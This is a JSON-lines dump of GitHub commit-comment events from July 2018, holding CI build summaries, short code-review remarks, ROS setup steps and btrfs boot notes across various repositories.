{"id":"7980761692","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29744339,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T05:42:49Z","updated_at":"2018-07-18T05:42:49Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-18T05:42:49Z"}
{"id":"7980764725","type":"CommitCommentEvent","actor":{"login":"Kuller86"},"repo":{"name":"sergeil/SliExtJsIntegrationBundle"},"payload":{"comment":{"id":29744344,"position":50,"line":76,"path":"DataMapping/EntityDataMapperService.php","commit_id":"ed096c145ba4626a0d0c44ae40f7a3f56471c733","created_at":"2018-07-18T05:43:52Z","updated_at":"2018-07-18T05:43:52Z","author_association":"NONE","body":"TokenInterface don't implemented method getStorage(), need used getUser()"}},"created_at":"2018-07-18T05:43:52Z"}
{"id":"7980765856","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29744345,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T05:44:17Z","updated_at":"2018-07-18T05:44:17Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T05:44:17Z"}
{"id":"7980767066","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29744351,"position":null,"line":null,"path":null,"commit_id":"5c7c855d54b5be33b6e8cbb280e04efd614cdab0","created_at":"2018-07-18T05:44:45Z","updated_at":"2018-07-18T05:44:45Z","author_association":"COLLABORATOR","body":"Amazing! Look forward to testing this tomorrow!"}},"created_at":"2018-07-18T05:44:45Z"}
{"id":"7980767575","type":"CommitCommentEvent","actor":{"login":"nimble-squirrel"},"repo":{"name":"Rantastique/Funktionsplot"},"payload":{"comment":{"id":29744352,"position":null,"line":null,"path":null,"commit_id":"2a660b16d8ce0b2c81c6aa45d13b558e03e96499","created_at":"2018-07-18T05:44:57Z","updated_at":"2018-07-18T05:44:57Z","author_association":"COLLABORATOR","body":"+ abstract class MonadOp\r\n+  Minus/Sin/Cos/LogOp  extend MonadOp (gemeinsame Funktion +setOp(Knoten k)\r\nBis jetzt liest der Scanner \"ln\" als natürlicher Logarithmus, oder ist \"log\" besser?\r\n"}},"created_at":"2018-07-18T05:44:57Z"}
{"id":"7980769178","type":"CommitCommentEvent","actor":{"login":"azgotcha"},"repo":{"name":"azgotcha/AZmuscle"},"payload":{"comment":{"id":29744360,"position":2,"line":2,"path":"README.md","commit_id":"3c63dbd9ffdd58f23cdf8645307d9714febed060","created_at":"2018-07-18T05:45:33Z","updated_at":"2018-07-18T05:45:33Z","author_association":"OWNER","body":"I’m not sure I know what I’m doing"}},"created_at":"2018-07-18T05:45:33Z"}
{"id":"7980774610","type":"CommitCommentEvent","actor":{"login":"Araq"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29744374,"position":null,"line":null,"path":null,"commit_id":"ae09879b3a1a87b3949a9847ce517b2a507b7167","created_at":"2018-07-18T05:47:30Z","updated_at":"2018-07-18T05:47:30Z","author_association":"MEMBER","body":"The problem is that ``raise x; wrong = true`` is not allowed but ``(if true: raise x); wrong = true`` is. ;-)"}},"created_at":"2018-07-18T05:47:30Z"}
{"id":"7980783104","type":"CommitCommentEvent","actor":{"login":"OlegLeshko"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29744392,"position":21,"line":21,"path":"Homework_5/Tasks.java","commit_id":"cb0c0a2313bda2d3be9e206aa6222d6c246c54de","created_at":"2018-07-18T05:50:30Z","updated_at":"2018-07-18T05:50:30Z","author_association":"COLLABORATOR","body":"буде)"}},"created_at":"2018-07-18T05:50:30Z"}
{"id":"7980790346","type":"CommitCommentEvent","actor":{"login":"eyberthrojas"},"repo":{"name":"eyberthrojas/message_protocol"},"payload":{"comment":{"id":29744404,"position":null,"line":null,"path":null,"commit_id":"c294b2dd45c574584ce9e7dc2ddf1bd53de44b26","created_at":"2018-07-18T05:53:10Z","updated_at":"2018-07-18T05:53:10Z","author_association":"OWNER","body":"SYSTEM REQUIREMENTS\r\n\t- Ubuntu 16.04 64 bits\r\n\t- ROS Kinetic\r\n\t- Catkin workspace\r\nINCLUIR\r\n\t- En archivo .bashrc al final y cambiando **usuario** por el nombre del usuario:\r\n\r\nsource /opt/ros/kinetic/setup.bash\r\nsource /home/**usuario**/catkin_ws/devel/setup.bash\r\nexport ROS_WORKSPACE=/home/**usuario**/catkin_ws\r\nexport ROS_PACKAGE_PATH=$ROS_PACKAGE_PATH:$ROS_WORKSPACE\r\nexport ROSCONSOLE_FORMAT='[${severity}] [${time}]: ${message}'\r\n\r\n\r\nCOMPILAR\r\n\t- cd ~/catkin_ws/src\r\n\t- git clone https://github.com/eyberthrojas/message_protocol.git\r\n\t- roscd\r\n\t- catkin_make\r\n\t\r\nEJECUCIÓN\r\n\t- roscore \r\n\t- rosrun  message_protocol emitter_node  (En un nuevo terminal)\r\n        - rosrun  message_protocol receiver_node  (En un nuevo terminal)"}},"created_at":"2018-07-18T05:53:10Z"}
{"id":"7980795338","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744414,"position":62,"line":62,"path":"app/src/main/java/com/example/delhivery/newsapp/NewsActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T05:54:55Z","updated_at":"2018-07-18T05:54:55Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-18T05:54:55Z"}
{"id":"7980795906","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744416,"position":69,"line":69,"path":"app/src/main/java/com/example/delhivery/newsapp/NewsAdapter.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T05:55:08Z","updated_at":"2018-07-18T05:55:08Z","author_association":"OWNER","body":"done again\r\n"}},"created_at":"2018-07-18T05:55:08Z"}
{"id":"7980800321","type":"CommitCommentEvent","actor":{"login":"MaryamShahpasandMQ"},"repo":{"name":"MaryamShahpasandMQ/Adversarial-Machine-Learning-Poisoning-Attack"},"payload":{"comment":{"id":29744418,"position":null,"line":null,"path":null,"commit_id":"09d303734d1242c2eb1248ebf65a3109fcba5c73","created_at":"2018-07-18T05:56:38Z","updated_at":"2018-07-18T05:56:38Z","author_association":"OWNER","body":"inspired by https://github.com/yenchenlin/awesome-adversarial-machine-learning"}},"created_at":"2018-07-18T05:56:38Z"}
{"id":"7980802662","type":"CommitCommentEvent","actor":{"login":"WaveHack"},"repo":{"name":"stromblom/OpenDominion"},"payload":{"comment":{"id":29744422,"position":95,"line":130,"path":"src/Http/Controllers/RoundController.php","commit_id":"f86c7ccc84a1c20109a1aacbcdebc0ed76c4a81f","created_at":"2018-07-18T05:57:28Z","updated_at":"2018-07-18T05:57:28Z","author_association":"NONE","body":"Instead of `->get()` (which fetches all results based on the WHERE-criteria), you can do a `->find()` or `->findOrFail()`.\r\n\r\nThe latter two return a single result instead of an eloquent Collection if the data is found. If no data was found then `->find()` return `null` or `->findOrFail()` throws a ModelNotFoundException (iirc)."}},"created_at":"2018-07-18T05:57:28Z"}
{"id":"7980804245","type":"CommitCommentEvent","actor":{"login":"simurai"},"repo":{"name":"atom/github"},"payload":{"comment":{"id":29744424,"position":null,"line":null,"path":null,"commit_id":"ac4d3a14ef46397f2c23c16bfbc918aa8c00c66e","created_at":"2018-07-18T05:58:02Z","updated_at":"2018-07-18T05:58:02Z","author_association":"MEMBER","body":"Oops.. this was supposed to be a PR. Luckily CI passed. :sweat_smile:"}},"created_at":"2018-07-18T05:58:02Z"}
{"id":"7980804551","type":"CommitCommentEvent","actor":{"login":"WaveHack"},"repo":{"name":"stromblom/OpenDominion"},"payload":{"comment":{"id":29744425,"position":101,"line":136,"path":"src/Http/Controllers/RoundController.php","commit_id":"f86c7ccc84a1c20109a1aacbcdebc0ed76c4a81f","created_at":"2018-07-18T05:58:08Z","updated_at":"2018-07-18T05:58:08Z","author_association":"NONE","body":"Laravel Collections have a `->first()` method for getting the first item/"}},"created_at":"2018-07-18T05:58:08Z"}
{"id":"7980810282","type":"CommitCommentEvent","actor":{"login":"chenhua2018"},"repo":{"name":"chenhua2018/python_test"},"payload":{"comment":{"id":29744436,"position":1,"line":1,"path":"README.md","commit_id":"80b3763993e16e93d21dd3544c282ab4c97d4e4e","created_at":"2018-07-18T06:00:08Z","updated_at":"2018-07-18T06:00:08Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-18T06:00:08Z"}
{"id":"7980810402","type":"CommitCommentEvent","actor":{"login":"vk1993"},"repo":{"name":"vk1993/Assignment_1TELSTRA"},"payload":{"comment":{"id":29744438,"position":30,"line":30,"path":"src/main/java/com/springRest/demo/SpringRest/Controller/RestData.java","commit_id":"70f1aeb070574768c9685bb7420f44dba5ad9ea7","created_at":"2018-07-18T06:00:11Z","updated_at":"2018-07-18T06:00:11Z","author_association":"OWNER","body":"Or else ,i should try with **_Exception.class_** "}},"created_at":"2018-07-18T06:00:11Z"}
{"id":"7980810953","type":"CommitCommentEvent","actor":{"login":"chenhua2018"},"repo":{"name":"chenhua2018/python_test"},"payload":{"comment":{"id":29744446,"position":1,"line":1,"path":"README.md","commit_id":"80b3763993e16e93d21dd3544c282ab4c97d4e4e","created_at":"2018-07-18T06:00:20Z","updated_at":"2018-07-18T06:00:20Z","author_association":"OWNER","body":"what "}},"created_at":"2018-07-18T06:00:20Z"}
{"id":"7980812066","type":"CommitCommentEvent","actor":{"login":"chenhua2018"},"repo":{"name":"chenhua2018/python_test"},"payload":{"comment":{"id":29744453,"position":1,"line":1,"path":"README.md","commit_id":"80b3763993e16e93d21dd3544c282ab4c97d4e4e","created_at":"2018-07-18T06:00:41Z","updated_at":"2018-07-18T06:00:41Z","author_association":"OWNER","body":"when where who why"}},"created_at":"2018-07-18T06:00:41Z"}
{"id":"7980813275","type":"CommitCommentEvent","actor":{"login":"chenhua2018"},"repo":{"name":"chenhua2018/python_test"},"payload":{"comment":{"id":29744458,"position":null,"line":null,"path":null,"commit_id":"80b3763993e16e93d21dd3544c282ab4c97d4e4e","created_at":"2018-07-18T06:01:05Z","updated_at":"2018-07-18T06:01:05Z","author_association":"OWNER","body":"when where who what why how"}},"created_at":"2018-07-18T06:01:05Z"}
{"id":"7980822685","type":"CommitCommentEvent","actor":{"login":"devops0309"},"repo":{"name":"devops0309/nginx-travis-demo"},"payload":{"comment":{"id":29744478,"position":null,"line":null,"path":null,"commit_id":"a1a2cd364676919938c30ceeeee36761f129d844","created_at":"2018-07-18T06:04:12Z","updated_at":"2018-07-18T06:04:12Z","author_association":"OWNER","body":"changed\r\n"}},"created_at":"2018-07-18T06:04:12Z"}
{"id":"7980828471","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744487,"position":101,"line":101,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T06:06:07Z","updated_at":"2018-07-18T06:06:07Z","author_association":"OWNER","body":"Removed it.\r\n"}},"created_at":"2018-07-18T06:06:07Z"}
{"id":"7980829524","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744489,"position":91,"line":91,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T06:06:28Z","updated_at":"2018-07-18T06:06:28Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-18T06:06:28Z"}
{"id":"7980830244","type":"CommitCommentEvent","actor":{"login":"Janonggg"},"repo":{"name":"Janonggg/ezekiel"},"payload":{"comment":{"id":29744491,"position":null,"line":null,"path":null,"commit_id":"53a4366511603d371063ed2290382451414a1450","created_at":"2018-07-18T06:06:41Z","updated_at":"2018-07-18T06:06:41Z","author_association":"OWNER","body":"![macho](https://user-images.githubusercontent.com/41356744/42862849-bff345c2-8a93-11e8-9abe-37c0454d47d1.jpg)\r\n![poropoint](https://user-images.githubusercontent.com/41356744/42862851-c030b2ea-8a93-11e8-9e1d-73f53e9b32b1.jpg)\r\n![pagoda](https://user-images.githubusercontent.com/41356744/42862853-c07d712a-8a93-11e8-9c09-ac46e2c1e41e.jpg)\r\n"}},"created_at":"2018-07-18T06:06:41Z"}
{"id":"7980830957","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744492,"position":60,"line":60,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T06:06:55Z","updated_at":"2018-07-18T06:06:55Z","author_association":"OWNER","body":"Removed."}},"created_at":"2018-07-18T06:06:55Z"}
{"id":"7980834730","type":"CommitCommentEvent","actor":{"login":"pardeike"},"repo":{"name":"pardeike/Harmony"},"payload":{"comment":{"id":29744497,"position":null,"line":null,"path":null,"commit_id":"7a69235f59e30c0379448572450ac8c083221f09","created_at":"2018-07-18T06:08:07Z","updated_at":"2018-07-18T06:08:07Z","author_association":"OWNER","body":"Yes, work in progress "}},"created_at":"2018-07-18T06:08:07Z"}
{"id":"7980838806","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29744505,"position":39,"line":39,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-18T06:09:22Z","updated_at":"2018-07-18T06:09:22Z","author_association":"OWNER","body":"good catch - so we need to waive the output on screen and just pipe it to serialdev with  `> /dev/$serialdev` instead of using `tee`\r\n"}},"created_at":"2018-07-18T06:09:22Z"}
{"id":"7980845464","type":"CommitCommentEvent","actor":{"login":"DavidLP"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29744514,"position":22,"line":202,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-18T06:11:21Z","updated_at":"2018-07-18T06:11:21Z","author_association":"MEMBER","body":"Please no premature optimization. This gives no real speed benefit but hides bugs better. "}},"created_at":"2018-07-18T06:11:21Z"}
{"id":"7980849395","type":"CommitCommentEvent","actor":{"login":"DavidLP"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29744518,"position":44,"line":279,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-18T06:12:35Z","updated_at":"2018-07-18T06:12:35Z","author_association":"MEMBER","body":"Would always use np.zeros "}},"created_at":"2018-07-18T06:12:35Z"}
{"id":"7980850960","type":"CommitCommentEvent","actor":{"login":"nd-hung"},"repo":{"name":"igraph/python-igraph"},"payload":{"comment":{"id":29744519,"position":null,"line":null,"path":null,"commit_id":"8864b46849b031a3013764d03e167222963c0f5d","created_at":"2018-07-18T06:13:04Z","updated_at":"2018-07-18T06:13:04Z","author_association":"NONE","body":"It works, thanks alot!"}},"created_at":"2018-07-18T06:13:04Z"}
{"id":"7980853534","type":"CommitCommentEvent","actor":{"login":"silenceinthesky"},"repo":{"name":"silenceinthesky/Tools"},"payload":{"comment":{"id":29744525,"position":null,"line":null,"path":null,"commit_id":"e6330b72c260cc4ff2b005a7500d40211c08f78a","created_at":"2018-07-18T06:13:53Z","updated_at":"2018-07-18T06:13:53Z","author_association":"OWNER","body":"aes gcm，hmac sha256，char to hex, string to hex"}},"created_at":"2018-07-18T06:13:53Z"}
{"id":"7980854495","type":"CommitCommentEvent","actor":{"login":"TomasYu"},"repo":{"name":"guoxin-nj/okhttp"},"payload":{"comment":{"id":29744530,"position":null,"line":null,"path":null,"commit_id":"312164c307aa6c89eb9f7f84ac85453b42c0dbf1","created_at":"2018-07-18T06:14:11Z","updated_at":"2018-07-18T06:14:11Z","author_association":"NONE","body":"this can work well?  the right is same to the left !"}},"created_at":"2018-07-18T06:14:11Z"}
{"id":"7980854952","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744531,"position":292,"line":292,"path":"app/src/main/java/com/example/delhivery/newsapp/MainActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T06:14:19Z","updated_at":"2018-07-18T06:14:19Z","author_association":"OWNER","body":"Commented the call because it was not functioning."}},"created_at":"2018-07-18T06:14:19Z"}
{"id":"7980855753","type":"CommitCommentEvent","actor":{"login":"Whyrun2018"},"repo":{"name":"Whyrun2018/git_demo"},"payload":{"comment":{"id":29744532,"position":null,"line":null,"path":null,"commit_id":"4004f71e9efe6b9cfaa555badc76f73b7809c44e","created_at":"2018-07-18T06:14:33Z","updated_at":"2018-07-18T06:14:33Z","author_association":"OWNER","body":" static void main String(args)"}},"created_at":"2018-07-18T06:14:33Z"}
{"id":"7980857025","type":"CommitCommentEvent","actor":{"login":"rapgro"},"repo":{"name":"palinek/nm-tray"},"payload":{"comment":{"id":29744534,"position":12,"line":349,"path":"src/tray.cpp","commit_id":"7120cf930014a53efbbc546ae38f69ab7492cac0","created_at":"2018-07-18T06:14:58Z","updated_at":"2018-07-18T06:14:58Z","author_association":"NONE","body":"> Note: If XDG_CONFIG_DIRS is unset, the default value of /etc/xdg is used.\r\nFor packaging, I would prefer this default. So I would just copy the template to there."}},"created_at":"2018-07-18T06:14:58Z"}
{"id":"7980860378","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29744540,"position":null,"line":null,"path":null,"commit_id":"88fd46d67be33ae2d219b5d5644584c9438a0068","created_at":"2018-07-18T06:15:56Z","updated_at":"2018-07-18T06:15:56Z","author_association":"NONE","body":"This was already tested with bonus (6,6) and passed and waits to merge (see PR https://github.com/official-stockfish/Stockfish/pull/1681)"}},"created_at":"2018-07-18T06:15:56Z"}
{"id":"7980863711","type":"CommitCommentEvent","actor":{"login":"long123bin"},"repo":{"name":"long123bin/middle_socket"},"payload":{"comment":{"id":29744543,"position":null,"line":null,"path":null,"commit_id":"040b259cca0c7442fdb10b887236c08ba5f9eaab","created_at":"2018-07-18T06:17:01Z","updated_at":"2018-07-18T06:17:01Z","author_association":"OWNER","body":"for test "}},"created_at":"2018-07-18T06:17:01Z"}
{"id":"7980864776","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29744544,"position":null,"line":null,"path":null,"commit_id":"88fd46d67be33ae2d219b5d5644584c9438a0068","created_at":"2018-07-18T06:17:20Z","updated_at":"2018-07-18T06:17:20Z","author_association":"OWNER","body":"Cool\n Thx.  Is there any search capability for previous tests?\n\nOn Wed, Jul 18, 2018, 12:15 AM Stefan Geschwentner <notifications@github.com>\nwrote:\n\n> This was already tested with bonus (6,6) and passed and waits to merge\n> (see PR official-stockfish#1681\n> <https://github.com/official-stockfish/Stockfish/pull/1681>)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/88fd46d67be33ae2d219b5d5644584c9438a0068#commitcomment-29744540>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSFqknk8S00rqsCqNhFhnCmjLni28ks5uHtKdgaJpZM4VUARK>\n> .\n>\n"}},"created_at":"2018-07-18T06:17:20Z"}
{"id":"7980864994","type":"CommitCommentEvent","actor":{"login":"ookangzheng"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":29744545,"position":null,"line":null,"path":null,"commit_id":"611bf32f1b17c408ec1da931e5c3b5f91f381ae5","created_at":"2018-07-18T06:17:24Z","updated_at":"2018-07-18T06:17:24Z","author_association":"NONE","body":"cdn.jsdelivr.net\r\n這個是cdn服務，被黑名單了"}},"created_at":"2018-07-18T06:17:24Z"}
{"id":"7980866442","type":"CommitCommentEvent","actor":{"login":"thecubic"},"repo":{"name":"thecubic/meta-intel-edison"},"payload":{"comment":{"id":29744551,"position":null,"line":null,"path":null,"commit_id":"4064d5f5d92d173792c8141c22c2fdfa193b6922","created_at":"2018-07-18T06:17:51Z","updated_at":"2018-07-18T06:17:51Z","author_association":"OWNER","body":"I did get this to work just fine.  The speedup of the boot process is\nabsolutely phenomenal - it was on the order of a minute or so with ext and\nnow it's just a few seconds with btrfs.\n\nfor u-boot, all it really needs is the filesystem to be enabled in the\nconfiguration section and then it works - then extload / fatload / btrload\nare all equivalent.  I haven't tried booting from btrfs directly, but I'm\nsure it works.  I wiped out the OTA and /home partitions and kept them as\none btrfs partition:\n\nroot@amahoro:~/src/oref0# uname -a ; cat /etc/*release ; btrfs filesystem\nshow /\nLinux amahoro 4.16.0-standard #2 SMP Sun Apr 8 17:38:29 PDT 2018 x86_64\nx86_64 x86_64 GNU/Linux\nID=\"poky-edison\"\nNAME=\"Poky (Yocto Project Reference Distro)\"\nVERSION=\"2.4.2 (rocko)\"\nVERSION_ID=\"2.4.2\"\nPRETTY_NAME=\"Poky (Yocto Project Reference Distro) 2.4.2 (rocko)\"\nEDISON-3.0\nCopyright Intel 2015\nLabel: none  uuid: d333f66b-b1f4-441e-8b08-8d3364082eb4\n        Total devices 1 FS bytes used 1.44GiB\n        devid    1 size 3.58GiB used 1.87GiB path /dev/mmcblk0p8\n\nI'm going to try the edison-fw repos with sumo64-acpi in the next few\ndays.  I started a \"repo\" manifest project to hold all of the repository\nindirection (https://github.com/thecubic/pancreato-manifest) - that also\nhas worked out (I want to support multiple machine types)\n\nOn Thu, Apr 5, 2018 at 1:13 PM, Ferry <notifications@github.com> wrote:\n\n> Maybe needs a config flag for U-Boot?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/thecubic/meta-intel-edison/commit/4064d5f5d92d173792c8141c22c2fdfa193b6922#commitcomment-28440558>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAKE2HZ8yY61IaXhfmzdshYWQclZgrGFks5tlnr0gaJpZM4QzD61>\n> .\n>\n"}},"created_at":"2018-07-18T06:17:51Z"}
{"id":"7980869295","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29744555,"position":1,"line":95,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T06:18:43Z","updated_at":"2018-07-18T06:18:43Z","author_association":"NONE","body":"Please follow: https://github.com/prestodb/presto#developers\r\n\r\nEspecially the last point about commit messages."}},"created_at":"2018-07-18T06:18:43Z"}
{"id":"7980869898","type":"CommitCommentEvent","actor":{"login":"ponomarenko-serhii"},"repo":{"name":"ponomarenko-serhii/huge-BulkUploadMod"},"payload":{"comment":{"id":29744557,"position":18,"line":151,"path":"application/config/config.development.php","commit_id":"f208687bdb6230ad046760ee361e7f7a76c04171","created_at":"2018-07-18T06:18:54Z","updated_at":"2018-07-18T06:18:54Z","author_association":"OWNER","body":"**### The previously mentioned gmail sensitive data is deprecated.**"}},"created_at":"2018-07-18T06:18:54Z"}
{"id":"7980871812","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29744561,"position":null,"line":null,"path":null,"commit_id":"88fd46d67be33ae2d219b5d5644584c9438a0068","created_at":"2018-07-18T06:19:30Z","updated_at":"2018-07-18T06:19:30Z","author_association":"NONE","body":"Search in the fish cooking result forum:\r\nhttps://groups.google.com/forum/#!forum/fishcooking_results\r\n\r\nThere for each test an automatic post is generated.  "}},"created_at":"2018-07-18T06:19:30Z"}
{"id":"7980874612","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744566,"position":null,"line":null,"path":null,"commit_id":"871e499b16a18520ee84dd9f68841aa5ce100d49","created_at":"2018-07-18T06:20:23Z","updated_at":"2018-07-18T06:20:23Z","author_association":"OWNER","body":"Task2\r\nexample 2 for courses Java\r\n\r\nСоздать программу, которая будет вычислять и выводить на экран сумму, разность, НОК и НОД двух целых чисел, введенных пользователем. Если пользователь некорректно введёт хотя бы одно из чисел, то сообщать об ошибке."}},"created_at":"2018-07-18T06:20:23Z"}
{"id":"7980874771","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29744567,"position":10,"line":98,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T06:20:26Z","updated_at":"2018-07-18T06:20:26Z","author_association":"NONE","body":"please generalize that to accept any number of projections"}},"created_at":"2018-07-18T06:20:26Z"}
{"id":"7980875527","type":"CommitCommentEvent","actor":{"login":"huiliang-liu"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29744568,"position":null,"line":null,"path":null,"commit_id":"4c2b6ffcbf98a92f9cde8ea7e184b03fbd918403","created_at":"2018-07-18T06:20:39Z","updated_at":"2018-07-18T06:20:39Z","author_association":"MEMBER","body":"Update pgbouncer 1.8.1 patch. Run test cases manually."}},"created_at":"2018-07-18T06:20:39Z"}
{"id":"7980876037","type":"CommitCommentEvent","actor":{"login":"ponomarenko-serhii"},"repo":{"name":"ponomarenko-serhii/huge-BulkUploadMod"},"payload":{"comment":{"id":29744569,"position":7,"line":79,"path":"application/config/config.development.php","commit_id":"f208687bdb6230ad046760ee361e7f7a76c04171","created_at":"2018-07-18T06:20:50Z","updated_at":"2018-07-18T06:20:50Z","author_association":"OWNER","body":"### The previously mentioned entry data is deprecated. **Cannot be used anymore to access the account.**"}},"created_at":"2018-07-18T06:20:50Z"}
{"id":"7980877390","type":"CommitCommentEvent","actor":{"login":"huiliang-liu"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29744571,"position":null,"line":null,"path":null,"commit_id":"ae723854c4e1738b8fe7fba409377bddca208a6e","created_at":"2018-07-18T06:21:16Z","updated_at":"2018-07-18T06:21:16Z","author_association":"MEMBER","body":"Update pgbouncer 1.8.1 patch. Run test cases manually."}},"created_at":"2018-07-18T06:21:16Z"}
{"id":"7980878939","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29744572,"position":5,"line":247,"path":"presto-tests/src/main/java/com/facebook/presto/tests/AbstractTestQueries.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T06:21:46Z","updated_at":"2018-07-18T06:21:46Z","author_association":"NONE","body":"instead add it to com.facebook.presto.sql.query.TestSubqueries"}},"created_at":"2018-07-18T06:21:46Z"}
{"id":"7980880221","type":"CommitCommentEvent","actor":{"login":"jjongyeonglee"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29744575,"position":null,"line":null,"path":null,"commit_id":"571b46abe22fd839d6d1344aded4ba0e9977e263","created_at":"2018-07-18T06:22:09Z","updated_at":"2018-07-18T06:22:09Z","author_association":"CONTRIBUTOR","body":"자바 들여쓰기가 4칸이네요\r\n"}},"created_at":"2018-07-18T06:22:09Z"}
